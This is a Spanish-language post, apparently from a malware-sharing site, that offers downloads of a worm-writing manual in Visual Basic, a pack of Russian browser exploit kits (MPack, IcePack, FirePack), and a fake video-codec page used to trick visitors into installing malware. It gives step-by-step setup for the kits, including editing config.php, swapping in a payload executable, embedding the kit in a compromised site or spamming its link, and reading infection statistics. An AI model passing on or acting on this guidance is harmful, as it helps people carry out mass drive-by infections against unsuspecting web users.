Este es un paper creado por Hendrix para Abril negro 2006 del foro elhacker.net, en el manual se explica los conceptos basicos para crear un worm en visual basic 6, esta muy bien explicado, sobre todo para los que recien se inician con la programacion.
Indice
1. Cosas basicas de un buen Malware
2. Dificultar la desinfeccion del Worm
3. Propagacion por redes P2P
4. Propagacion por MSN
5. Encriptacion Anti-Huristica de los AV's
6. Firmas en el PC
7. Propagacion por e-mail (esta aun la tengo que aprender)
8. Infeccion de archivos .exe y archivos .rar
9. Sorpresitas en el code del Worm
En el manual se trata de explicar el principio de funcionamiento basico, pero si quieren que el worm funcione al 100% hay que mejorar el codigo un poco, por ejemplo usando variables de sistema, teniendo en cuenta que no todas las pcs tienen como idioma el español, hay que hacerlo compatible con windows vista, etc.
Tambien recomendaria cambiar la propagacion por MSN, usando la Messenger API Type Library, con esto tendria que funcionar bien en todas las pcs con windows y msn live hoy en dia. En ESTE LINK pueden ver ejemplos del uso de esta api.
En fin, se le pueden mejorar muchisimas cosas, incluso agregarle otros metodos de propagacion como pueden ser por USB, o por LAN que son muy populares hoy en dia.
Descarga
Creacion de worms en VB (rapidshare)
Creacion de worms en VB (megaupload)
Esta es una recopilacion de los exploit rusos para navegadores mas conocidos, la funcion basica de estos exploit es explotar fallas en navegadores, para ejecutar archivos .exe sin autorizacion del usuario de forma totalmente invisible.
My poly sploit
El pack incluye los siguientes exploit:
0x88
adpack-1
adpack-2
armitage
cry217
fiesta-1
fiesta-2
firepack-1
firepack-2
g-pack
ice-pack-1
ice-pack-2
ice-pack-3
infector
mpack
mpack-081
mpack-086
mpack-091
mpack-099
multisploit
my-poly-sploit
rds
smartpack
target-exploit
tor
unkown
Todos estos exploit son del 2008-2009, y funcionan bien en muchas pcs, aunque el porcentaje de infeccion es bajo debido a los parches en los navegadores, pero algunos estan funcionando bien con Internet explorer 7 y firefox 3 sin actualizar, que son los navegadores mas utilizados hoy en dia.
Ice pack:
Para los que nunca administraron una web, o no tienen idea de programacion tal vez se les haga dificil entenderlos, pero la configuracion de estos exploit es muy simple. Basta con subir todos sus archivos a un servidor que soporte el uso de base de datos, y buscar el archivo config.php, settings.php o similar y editar alli la configuracion de los exploit, tambien deberan crear una base de datos en su host para almacenar los datos, si no no funcionara.
Lo que es configuracion esta todo en ingles, en algunos para la parte de estadisticas pueden ver que esta en ruso, pero no es necesario entender ruso ya que son palabras simples y al hacer click facilmente se puede saber su significado, por ejemplo si lo que quieren es ver cantidad de infectados o pais de donde provienen. Lo que realmente importa esta en ingles.
Mpack: estadisticas
Y como dije antes no recomiendo este tipo de exploit para infectar alguien en especifico, porque no sirve para eso.
Y dejo a los usuarios que vean cada exploit para ver cual es el mejor, los exploit generalmente se encuentran en una carpeta todos juntos, y se puede ver a que navegadores afecta, no puedo poner las caracteristicas de cada uno porque si no no termino mas. Si no para cualquier pregunta, estan los comentarios.
Descarga
Pack de exploit rusos (rapidshare)
Pack de exploit rusos (megaupload)
pass: troyanosyvirus.com.ar
Recomiendo leer FirePack Lite v.0.11, encontraran mas informacion sobre el firepack 0.11, que es (o fue jaja) uno de los mas populares.
La recopilacion fue obtenida de un usuario ruso de opensc.ws
Esto basicamente es un simple html que contiene un video, y para ver dicho video requiere descargarse un codec, se usa para infectar con cualquier malware.
Funciona de la siguiente manera
1-El usuario ingresa en la web fake para ver un video..
2-Para ver el video se requiere la descarga de un archivo entonces el usuario puede o no proceder a descargar el "codec", si no lo descarga no pasara nada, ni podra ver el video.
3-Si el usuario instala ese "codec" quedara infectado y podra ver el video sin problemas para que no haya sospechas.
Es un metodo utilizado por los "spammers" para infectar de forma masiva, y no es nada novedoso pero nunca esta de mas postearlo.
El archivo fake.html se puede subir a cualquier host, se le puede cambiar el nombre o modificarlo completo a gusto de cada uno. Las imagenes se encuentran en la carpeta commons, y ya estan alojadas en imageshack.us asi que no es nesesario subirlas.
Se debe modificar las URL siguiente con el bloc de notas u otro editor:
http://servidor.com/archivo.exe
Y opcionales:
http://server/mov1.html
http://server/mov1.wmv
Recomendacion?
No descarguen codecs de webs que no sean conocidas y menos si su extension es .exe jaja...
Descarga
Codecs fake web en html
Codecs fake web en html
FirePack es un kit que explota fallas en navegadores de internet desactualizados, basicamente sirve para ejecutar archivos .exe mediante web de manera silenciosa, el script detecta el navegador que esta usando la victima y dependiendo de cual use explotara una falla en el navegador para ejecutar un archivo, que puede ser un troyano o un bot generalmente.
El script es de origen ruso, cuando salio al mercado tenia un costo de 3000 USD... y una tasa de infeccion superior al 80-85% o sea que si se lo integraba en una web que recibiera 2000 visitas por dia, infectaba 1600 pcs!!.
Hoy en dia tiene una tasa de infeccion de un 15-20% (300 infecciones por dia en una web con 2000 visitas por dia, suponiendo que se tiene un server indetectable), esto se debe a que los navegadores se van actualizando.
Actualmente existen varios de estos script, como el Mpack o IcePack, tambien hay una version nueva del FirePack, pero esta en ruso y es algo complicada, asi que dejo esta que es la mas facil de usar.
La ventaja que tiene este script es que es dificil de detectar para los administradores y visitantes de las webs, puede estar meses, incluso años sin que se den cuenta, y en todo ese tiempo se puede estar infectando pcs, a diferencia de los sistemas de certificados java, o activeX que tienen una tasa mas grande de infeccion, pero en cuanto el administrador se de cuenta lo eliminara, generalmente no dura mas de una semana.
La gran desventaja es que se nesecita obtener acceso a alguna web con muchas visitas, para algunos sera como entrar al msn, y para otros sera imposible y no les servira este script.
Otra desventaja es el bajo porcentaje de infeccion si se lo compara con otro tipo de infecciones mediante webs (java, videos, descarga de archivos infectados, etc).
Si no tienen acceso a una web pero tienen posibilidad de mostrar algun link, pueden hacerlo, suben el pack a cualquier host gratuito que acepte php y espamean con el link del pack en sus firmas de foros, por el msn, o con algun mailer envian el link a una buena "mailist".
Hay que tener en cuenta que funciona en un 15-20% (a veces menos) de los click que le den a la web, por lo tanto no es recomendado enviarselo a algun contacto del msn o a alguien en especial.
Configuracion:
Para dejar funcionando el script modifican el archivo config.php, le ponen la direccion donde estara alojado el archivo exec.php y si quieren le modifican el user y pass para ingresar a la administracion.
Despues deben cambiar el archivo file.exe por su archivo que quieran que se ejecute al ingresar a index.php.
Una vez realizado esto suben todo el pack a alguna web y se integra el index.php con el index de la web (nesecitaran saber algo basico de html).
Eso es todo, ahora es cuestion d esperar, pueden ver las estadisticas de infecciones en admin/index.php, les pedira user y pass, ponen los del archivo config.php.
Descarga:
FirePack Lite v.0.11 (badongo)
FirePack Lite v.0.11 (rapidshare)
PD: Actualizen sus navegadores!!! jaja